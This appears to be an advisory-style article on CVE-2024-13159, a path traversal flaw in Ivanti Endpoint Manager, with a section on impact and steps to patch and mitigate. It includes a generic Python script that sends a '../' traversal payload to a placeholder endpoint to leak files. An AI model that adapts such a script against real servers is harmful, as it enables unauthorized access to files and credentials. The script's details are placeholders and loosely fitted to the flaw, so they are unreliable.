CVE-2024-13159: Absolute Path Traversal Vulnerability Found in Ivanti EPM - Exploit Details and Mitigation Steps

A high-severity vulnerability, identified as CVE-2024-13159, has been discovered in Ivanti Endpoint Manager (EPM) software. This absolute path traversal vulnerability allows a remote unauthenticated attacker to exploit sensitive information disclosure. Ivanti EPM versions affected by this issue are those before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update. In this article, we will discuss the impact of this vulnerability, exploit details, and how to mitigate this issue.

Exploit Details

CVE-2024-13159 is an absolute path traversal vulnerability within the file handling functions of Ivanti EPM. This vulnerability exists due to a lack of proper input validation and sanitization. Specifically, the affected functionality does not restrict an attacker from traversing the file system to access files outside the intended directory.

An unauthenticated attacker can exploit this vulnerability by sending a specially crafted web request to the Ivanti EPM server, which can lead to unauthorized disclosure of sensitive information. Such information may include system configuration details, server logs, user credentials, and other confidential data.

Code Snippet

To give an idea of the exploit, here's a simple Python script example that demonstrates how an attacker can exploit the vulnerability:

import requests

target_url = "https://[target_ip]:[port]/path/to/vulnerable/endpoint";
traversal_path = "../../../../path/to/sensitive/file.txt"

payload = {
    "filename": traversal_path
}

response = requests.get(target_url, params=payload, verify=False)

if response.status_code == 200:
    print("Successfully leaked sensitive data:")
    print(response.text)
else:
    print("Failed to exploit vulnerability")

Original References

[1] Ivanti EPM Security Advisory: https://[ivanti_security_advisory_link]
[2] CVE-2024-13159 Entry in NIST National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2024-13159

To mitigate the impact of CVE-2024-13159, follow these steps

1. Update your Ivanti EPM software to the latest available version. Download the 2024 January-2025 Security Update or the 2022 SU6 January-2025 Security Update from Ivanti's website and install it on your Ivanti EPM server.

2. As a defensive measure, monitor your server logs for any unusual or suspicious activity, such as multiple failed login attempts or unauthorized remote connections.

3. Implement security best practices for your environment, including strong authentication mechanisms, least-privilege access policies, and regular security monitoring.

Conclusion

CVE-2024-13159 is a critical vulnerability that affects the security of Ivanti EPM systems. Organizations using vulnerable versions of the software should immediately apply the necessary security updates and follow best practices for securing their environment. By staying informed of emerging threats and regularly updating software, organizations can minimize the risk of security breaches and protect their valuable data.

Timeline

Published on: 01/14/2025 18:15:26 UTC
Last modified on: 03/13/2025 15:28:42 UTC